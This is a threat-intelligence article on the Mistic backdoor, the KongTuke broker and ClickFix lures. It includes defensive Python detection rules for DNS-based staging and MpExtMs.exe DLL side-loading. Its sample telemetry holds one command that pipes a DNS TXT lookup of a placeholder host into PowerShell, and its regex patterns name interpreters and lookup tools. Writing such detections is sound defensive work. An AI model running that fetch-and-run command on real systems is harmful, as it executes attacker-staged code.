Mistic Backdoor
A sophisticated backdoor known as Mistic, also tracked as MLTBackdoor, has surfaced in a wave of suspected financially motivated cyberattacks that have been active since April 2026. The malware has been detected in attacks against organizations operating in the insurance, education, information technology, and professional services sectors.
Security researchers have linked the operation to the initial access broker (IAB) KongTuke, also known by several aliases, including 404 TDS, Chaya_002, LandUpdate808, TAG-124, and Woodgnat. During these intrusions, Mistic has been deployed alongside ModeloRAT, a Python-based remote access trojan previously attributed to the same threat actor.
Designed for Stealth and Long-Term Access
Mistic stands out because of its ability to operate entirely in memory without writing files to disk, significantly reducing the chances of detection. The malware also incorporates a built-in kill switch that allows it to erase itself when necessary. These characteristics suggest that the operators are focused on maintaining persistent and covert access to compromised environments.
To avoid attracting attention, the malware relies on DLL side-loading techniques, abusing Microsoft's legitimate endpoint security utility MpExtMs.exe to blend into normal system activity.
The Evolution of ClickFix Delivery Campaigns
ModeloRAT first gained attention in January 2026 during investigations into a ClickFix campaign variant known as CrashFix. In this operation, KongTuke actors distributed a malicious Google Chrome extension disguised as an ad blocker. The extension intentionally crashed victims' browsers and then deceived them into executing malicious commands under the guise of performing a security scan.
Another ClickFix campaign used a different approach by instructing victims to execute commands that performed a Domain Name System (DNS) lookup. The DNS request was then used to retrieve the next-stage payload, effectively turning DNS into a lightweight staging and signaling mechanism for the attackers.
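Two of the tradecraft elements described above lend themselves to simple telemetry checks: the DLL side-loading through Microsoft's MpExtMs.exe, and the ClickFix variant in which a DNS lookup serves as the staging step. The following Python is an added defender-side example written for this page; it is not code from the reporting above or from any vendor named here. The events are constructed in a Sysmon-like shape (EventID 1 process creation, EventID 7 image load); the hostnames, user paths, DLL name, version folder and the assumed Defender platform install prefix are placeholders, not indicators from the article.

```python
import ntpath
import re
from typing import Dict, List, Optional

# Constructed Sysmon-style telemetry (EventID 1 = process creation,
# EventID 7 = image load). Hostnames, user paths, the DLL name and the
# version folder are placeholders invented for this example, not
# indicators taken from the reporting above.
SAMPLE_EVENTS: List[Dict] = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c nslookup -type=txt stage.example.invalid | powershell -"},
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": r"nslookup mail.example.invalid"},            # benign lookup
    {"id": 7, "image": r"C:\Users\alice\AppData\Local\Temp\Upd\MpExtMs.exe",
     "loaded": r"C:\Users\alice\AppData\Local\Temp\Upd\example_sideload.dll",
     "signed": False},
    {"id": 7, "image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\0.0.0-0\MpExtMs.exe",
     "loaded": r"C:\Windows\System32\kernel32.dll",
     "signed": True},                                          # normal load
]

# Rule 1: a DNS lookup whose output is chained into a script interpreter,
# the shape of the DNS-based ClickFix staging described in the text.
DNS_TOOL = re.compile(r"\b(nslookup|resolve-dnsname|dig)\b", re.I)
INTERPRETER = re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript|cmd)\b", re.I)
CHAIN_OP = re.compile(r"[|&;]")


def dns_to_interpreter(ev: Dict) -> Optional[str]:
    """Flag process-creation events where a DNS lookup feeds an interpreter."""
    if ev.get("id") != 1:
        return None
    cmd = ev.get("cmdline", "")
    m = DNS_TOOL.search(cmd)
    if not m:
        return None
    tail = cmd[m.end():]          # only what comes after the lookup matters
    if CHAIN_OP.search(tail) and INTERPRETER.search(tail):
        return f"DNS lookup chained into an interpreter: {cmd}"
    return None


# Rule 2: MpExtMs.exe (the signed Defender binary the text says is abused
# for side-loading) running outside its expected directory, or loading an
# unsigned DLL that sits beside it. The install prefix is an assumption.
SIDELOAD_HOST = "mpextms.exe"
EXPECTED_PREFIX = ntpath.normcase(
    r"C:\ProgramData\Microsoft\Windows Defender\Platform") + "\\"
SYSTEM_DIRS = tuple(ntpath.normcase(p) + "\\"
                    for p in (r"C:\Windows\System32", r"C:\Windows\SysWOW64"))


def suspicious_sideload(ev: Dict) -> Optional[str]:
    """Flag image-load events that look like DLL side-loading via MpExtMs.exe."""
    if ev.get("id") != 7:
        return None
    image = ntpath.normcase(ev.get("image", ""))
    if ntpath.basename(image) != SIDELOAD_HOST:
        return None
    reasons = []
    if not image.startswith(EXPECTED_PREFIX):
        reasons.append("host executable outside its expected Defender directory")
    loaded = ntpath.normcase(ev.get("loaded", ""))
    same_dir = ntpath.dirname(loaded) == ntpath.dirname(image)
    if same_dir and not loaded.startswith(SYSTEM_DIRS) and not ev.get("signed", False):
        reasons.append(f"unsigned DLL loaded from the executable's own directory: {ev['loaded']}")
    return "; ".join(reasons) if reasons else None


RULES = {"dns_staging": dns_to_interpreter, "mpextms_sideload": suspicious_sideload}


def scan(events: List[Dict]) -> List[Dict]:
    """Run every rule over every event; return one alert per (rule, event) hit."""
    alerts = []
    for ev in events:
        for name, rule in RULES.items():
            reason = rule(ev)
            if reason:
                alerts.append({"rule": name, "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a['rule']}] {a['reason']}")
```

Run against the constructed events, the scan raises exactly two alerts: the chained lookup-to-PowerShell command line, and the MpExtMs.exe copy in a temp folder loading an unsigned DLL from beside itself; the plain lookup and the Defender binary loading kernel32.dll from System32 pass. The second rule keys on the executable's location and the co-located unsigned DLL rather than on any particular DLL name, because the page does not identify the side-loaded library and a name-based rule would miss a renamed one.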
In June 2026, researchers also highlighted the use of ClickFix as a delivery mechanism for Mistic, attributing the activity to a ransomware-associated threat actor attempting to gain an initial foothold and facilitate lateral movement across networks.
Capabilities That Make Mistic Highly Dangerous
The backdoor offers a broad set of functions commonly associated with advanced remote access malware, including:
Uploading and downloading files, creating folders, and moving, renaming, or deleting files.
Executing malicious code directly in memory, loading Beacon Object Files to extend functionality, modifying command polling intervals, and terminating and deleting itself to eliminate evidence.
Opportunistic Targeting and Ransomware Connections
The campaign appears to follow an opportunistic model rather than focusing on a single industry. Attackers are reportedly compromising a wide range of organizations and then evaluating which victims could provide profitable access opportunities for sale to other cybercriminals.
Researchers have also observed ModeloRAT in attacks that ultimately resulted in the deployment of Qilin ransomware, reinforcing the connection between initial access brokers and ransomware operators.
KongTuke’s Expanding Arsenal of Social Engineering Techniques
KongTuke operates a sophisticated traffic distribution system (TDS) built on compromised WordPress websites. This infrastructure is used to present continuously changing lures that redirect unsuspecting visitors toward malware delivery chains.
More recently, security companies Rapid7 and ReliaQuest reported that the threat actor has shifted tactics by sending Microsoft Teams messages from fraudulent 'IT Support' accounts. These messages initiate an attack chain that culminates in the deployment of ModeloRAT.
A Growing Trend in Custom Malware Development
The sophistication of Mistic and the suspected involvement of Woodgnat in the development of ModeloRAT point to a highly skilled group specializing in stealthy remote access tools. The emergence of Backdoor.Mistic also reflects a broader industry trend in which ransomware operations increasingly rely on custom-built malware, exfiltration utilities, and specialized access tools.
Current evidence suggests that Mistic is likely the product of access brokers collaborating with ransomware affiliates rather than a tool developed directly by a ransomware group itself.